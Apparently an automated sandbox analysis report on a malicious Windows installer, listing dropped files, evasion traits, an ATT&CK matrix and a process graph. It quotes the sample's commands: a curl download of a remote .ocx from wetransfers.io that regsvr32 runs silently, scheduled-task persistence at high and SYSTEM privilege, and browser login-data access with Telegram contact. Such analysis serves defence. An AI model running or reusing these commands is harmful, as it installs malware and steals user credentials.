    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6264\ShortcutFlags.dllJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFF39.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFB66.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFD70.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI4251.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Users\user\Desktop\setup.exeAPI coverage: 7.8 %
    Source: C:\Program Files (x86)\Main\MainSoftware.exeAPI coverage: 0.0 %
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeAPI coverage: 0.0 %
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 4364Thread sleep count: 261 > 30Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 560Thread sleep count: 60 > 30Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 2316Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 6308Thread sleep count: 184 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 6308Thread sleep count: 252 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 6344Thread sleep count: 48 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 6308Thread sleep count: 54 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 6308Thread sleep count: 191 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 6308Thread sleep count: 4918 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 6308Thread sleep count: 526 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 6212Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe TID: 3804Thread sleep count: 292 > 30
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe TID: 6548Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Surfclub\Install.exe TID: 6528Thread sleep count: 227 > 30
    Source: C:\Program Files\Surfclub\Install.exe TID: 6528Thread sleep count: 85 > 30
    Source: C:\Program Files\Surfclub\Install.exe TID: 4136Thread sleep count: 62 > 30
    Source: C:\Program Files\Surfclub\Install.exe TID: 6148Thread sleep count: 685 > 30
    Source: C:\Program Files\Surfclub\Install.exe TID: 6148Thread sleep count: 35 > 30
    Source: C:\Program Files\Surfclub\Install.exe TID: 6500Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 3084Thread sleep count: 275 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 2112Thread sleep count: 43 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 2260Thread sleep count: 36 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 4464Thread sleep count: 176 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 3084Thread sleep count: 98 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 5472Thread sleep count: 451 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 2412Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\Users\user\AppData\Roaming FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923 FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004A03E0 FindFirstFileW,FindClose,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_2_004A03E0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004763A0 FindFirstFileW,GetLastError,FindClose,0_2_004763A0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004A2630 FindFirstFileW,FindClose,CloseHandle,CloseHandle,0_2_004A2630
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_003354C0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,0_2_003354C0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0049C670 FindFirstFileW,FindClose,0_2_0049C670
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004C0840 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_004C0840
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00485040 FindFirstFileW,FindClose,FindClose,0_2_00485040
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00475A60 FindFirstFileW,FindFirstFileW,FindClose,FindClose,0_2_00475A60
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_003354C0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,6_2_003354C0
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00359010 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,6_2_00359010
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0053F6C2 VirtualQuery,GetSystemInfo,0_2_0053F6C2
    Source: C:\Program Files (x86)\Main\MainSoftware.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Install.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Surfclub.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
    Source: setup.exe, 00000000.00000003.1748683968.00000000098C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
    Source: MainSoftware.exe, 00000013.00000002.2485035212.000001CE9DF84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: MainSoftware.exe, 00000013.00000002.2487963075.0000020F354F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_005482F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005482F3
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0046FA80 GetLocalTime,CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,0_2_0046FA80
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0048CF30 SHGetFolderPathW,GetSystemDirectoryW,GetWindowsDirectoryW,GetWindowsDirectoryW,GetModuleFileNameW,SHGetSpecialFolderLocation,LoadLibraryW,GetProcAddress,GetEnvironmentVariableW,SHGetPathFromIDListW,SHGetMalloc,0_2_0048CF30
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00542A8E mov esi, dword ptr fs:[00000030h]0_2_00542A8E
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00542A8E mov esi, dword ptr fs:[00000030h]6_2_00542A8E
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00542AFA GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,0_2_00542AFA
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Program Files\Surfclub\Surfclub.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00354B60 __set_se_translator,SetUnhandledExceptionFilter,0_2_00354B60
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_005482F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005482F3
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0054357E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0054357E
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_005482F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_005482F3
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_0054357E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0054357E
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00361A50 __set_se_translator,SetUnhandledExceptionFilter,6_2_00361A50
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00354B60 __set_se_translator,SetUnhandledExceptionFilter,6_2_00354B60
    Source: C:\Program Files (x86)\Main\MainSoftware.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.21.59.228 443
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 149.154.167.220 443
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 34.160.111.145 80
    .NET source code references suspicious native API functions
    Source: 35.2.Surfclub.exe.2b03cd20000.69.raw.unpack, ActiveDirectorySite.csReference to suspicious API methods: global::Interop.Kernel32.GetProcAddress(DirectoryContext.ADHandle, "DsListDomainsInSiteW")
    Source: 35.2.Surfclub.exe.2b03cd20000.69.raw.unpack, Utils.csReference to suspicious API methods: global::Interop.Advapi32.OpenProcessToken(global::Interop.Kernel32.GetCurrentProcess(), 8, out phThreadToken)
    Source: 35.2.Surfclub.exe.2b03cd20000.69.raw.unpack, DirectoryContext.csReference to suspicious API methods: global::Interop.Kernel32.LoadLibrary(systemDirectory + "\\ntdsapi.dll")
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_003FA4E0 CreateFileW,CloseHandle,WriteFile,CloseHandle,ShellExecuteExW,0_2_003FA4E0
    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="6264" CHAINERUIPROCESSID="6264Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\setup.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1741190130 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\setup.exe" AI_INSTALL="1"Jump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://datashieldsecure.com/amz/?source_id=1Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /fJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /run /tn "MyPersistentApp_Hourly"Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Program Files (x86)\Main\Chop\Install.exe "C:\Program Files (x86)\Main\Chop\Install.exe"
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "InstallTask_3ea42524-57b5-4d69-95b4-f56cc46a9b2b" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://datashieldsecure.com/amz/?source_id=1" /sc once /st 11:00:42 /ru SYSTEM /f
    Source: C:\Program Files (x86)\Main\Chop\Install.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!""
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\262810.ocx"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\262810.ocx"
    Source: C:\Program Files\Surfclub\Install.exeProcess created: C:\Program Files\Surfclub\Surfclub.exe "C:\Program Files\Surfclub\Surfclub.exe" install https://datashieldsecure.com/amz/?source_id=1
    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "c:\users\user\desktop\setup.exe" /i "c:\users\user\appdata\roaming\atomix\atomix 1.0.0\install\69b1923\distributor software.msi" ai_euimsi=1 appdir="c:\program files (x86)\atomix" secondsequence="1" clientprocessid="6264" chaineruiprocessid="6264chainer" action="install" executeaction="install" clientuilevel="0" addlocal="mainfeature" primaryfolder="appdir" rootdrive="c:\" ai_detected_admin_user="1" ai_setupexepath="c:\users\user\desktop\setup.exe" setupexedir="c:\users\user\desktop\" exe_cmd_line="/exenoupdates /forcecleanup /wintime 1741190130 " targetdir="c:\" ai_setupexepath_original="c:\users\user\desktop\setup.exe" ai_install="1"
    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "c:\users\user\desktop\setup.exe" /i "c:\users\user\appdata\roaming\atomix\atomix 1.0.0\install\69b1923\distributor software.msi" ai_euimsi=1 appdir="c:\program files (x86)\atomix" secondsequence="1" clientprocessid="6264" chaineruiprocessid="6264chainer" action="install" executeaction="install" clientuilevel="0" addlocal="mainfeature" primaryfolder="appdir" rootdrive="c:\" ai_detected_admin_user="1" ai_setupexepath="c:\users\user\desktop\setup.exe" setupexedir="c:\users\user\desktop\" exe_cmd_line="/exenoupdates /forcecleanup /wintime 1741190130 " targetdir="c:\" ai_setupexepath_original="c:\users\user\desktop\setup.exe" ai_install="1"Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00470D70 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,CloseHandle,0_2_00470D70
    Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,0_2_004A4A20
    Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,6_2_0055DD4F
    Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6264\dialog.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6264\dialog.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6264\banner.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6264\banner.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6264\banner.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6264\banner.jpg VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6264\dialog.jpg VolumeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Bay0NsQIzx\output.zip VolumeInformation
    Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Bay0NsQIzx\output.zip VolumeInformation
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004BBD60 CreateNamedPipeW,CreateFileW,0_2_004BBD60
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0054419E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0054419E
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004BA6E0 GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegDeleteValueW,RegCloseKey,0_2_004BA6E0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00317A00 GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,0_2_00317A00
    Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\user\Desktop\setup.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A BlobJump to behavior

    Stealing of Sensitive Information

    barindex
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Replication Through Removable Media    		12
    Native API    		1
    DLL Side-Loading    		1
    Exploitation for Privilege Escalation    		11
    Disable or Modify Tools    		1
    OS Credential Dumping    		1
    System Time Discovery    		Remote Services1
    Archive Collected Data    		1
    Web Service    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Command and Scripting Interpreter    		1
    Scheduled Task/Job    		1
    DLL Side-Loading    		1
    Deobfuscate/Decode Files or Information    		LSASS Memory11
    Peripheral Device Discovery    		Remote Desktop Protocol1
    Data from Local System    		1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Scheduled Task/Job    		Logon Script (Windows)112
    Process Injection    		2
    Obfuscated Files or Information    		Security Account Manager1
    Account Discovery    		SMB/Windows Admin Shares1
    Screen Capture    		11
    Encrypted Channel    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
    Scheduled Task/Job    		1
    Software Packing    		NTDS4
    File and Directory Discovery    		Distributed Component Object ModelInput Capture3
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Timestomp    		LSA Secrets26
    System Information Discovery    		SSHKeylogging4
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain Credentials131
    Security Software Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    File Deletion    		DCSync31
    Virtualization/Sandbox Evasion    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job33
    Masquerading    		Proc Filesystem2
    Process Discovery    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
    Modify Registry    		/etc/passwd and /etc/shadow1
    Application Window Discovery    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron31
    Virtualization/Sandbox Evasion    		Network Sniffing1
    System Owner/User Discovery    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd112
    Process Injection    		Input Capture1
    System Network Configuration Discovery    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1630230 Sample: setup.exe Startdate: 05/03/2025 Architecture: WINDOWS Score: 56 85 api.telegram.org 2->85 87 wetransfers.io 2->87 89 8 other IPs or domains 2->89 103 Suricata IDS alerts for network traffic 2->103 105 Antivirus detection for URL or domain 2->105 107 Antivirus detection for dropped file 2->107 111 7 other signatures 2->111 9 setup.exe 84 2->9         started        12 msiexec.exe 20 41 2->12         started        14 MainSoftware.exe 2->14         started        16 Install.exe 2->16         started        signatures3 109 Uses the Telegram API (likely for C&C communication) 85->109 process4 file5 67 C:\Users\user\AppData\...\MainSoftware.exe, PE32+ 9->67 dropped 69 C:\Users\user\...\SoftwareDistributor.exe, PE32+ 9->69 dropped 81 15 other malicious files 9->81 dropped 18 setup.exe 6 9->18         started        71 C:\Windows\Installer\MSI6C09.tmp, PE32 12->71 dropped 73 C:\Windows\Installer\MSI608E.tmp, PE32 12->73 dropped 75 C:\Windows\Installer\MSI6001.tmp, PE32 12->75 dropped 83 7 other malicious files 12->83 dropped 21 msiexec.exe 12 12->21         started        24 MainSoftware.exe 15 12->24         started        26 SoftwareDistributor.exe 12->26         started        32 2 other processes 12->32 77 C:\Program Files (x86)\Main\...\Install.exe, PE32+ 14->77 dropped 28 Install.exe 14->28         started        79 C:\Program Files\Surfclub\Surfclub.exe, PE32+ 16->79 dropped 30 Surfclub.exe 16->30         started        process6 dnsIp7 59 C:\Users\user\AppData\Local\...\shi3FF0.tmp, PE32+ 18->59 dropped 99 swiftvantage.online 172.67.183.127, 443, 49737 CLOUDFLARENETUS United States 21->99 61 C:\Program Files (x86)\...\Install.exe.part, PE32+ 21->61 dropped 63 C:\Program Files (x86)\...\Install.exe (copy), PE32+ 21->63 dropped 101 jonatechlab.com 104.21.6.210 CLOUDFLARENETUS United States 24->101 34 schtasks.exe 24->34         started        36 schtasks.exe 24->36         started        38 schtasks.exe 26->38         started        40 cmd.exe 28->40         started        42 conhost.exe 28->42         started        file8 process9 process10 44 conhost.exe 34->44         started        46 conhost.exe 36->46         started        48 conhost.exe 38->48         started        50 regsvr32.exe 40->50         started        54 curl.exe 40->54         started        57 conhost.exe 40->57         started        dnsIp11 91 api.telegram.org 149.154.167.220 TELEGRAMRU United Kingdom 50->91 93 ifconfig.me 34.160.111.145 ATGS-MMD-ASUS United States 50->93 113 System process connects to network (likely due to code injection or exploit) 50->113 115 Tries to harvest and steal browser information (history, passwords, etc) 50->115 95 wetransfers.io 104.21.59.228 CLOUDFLARENETUS United States 54->95 97 127.0.0.1 unknown unknown 54->97 65 C:\Users\user\AppData\Local\Temp\262810.ocx, PE32+ 54->65 dropped file12 signatures13

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.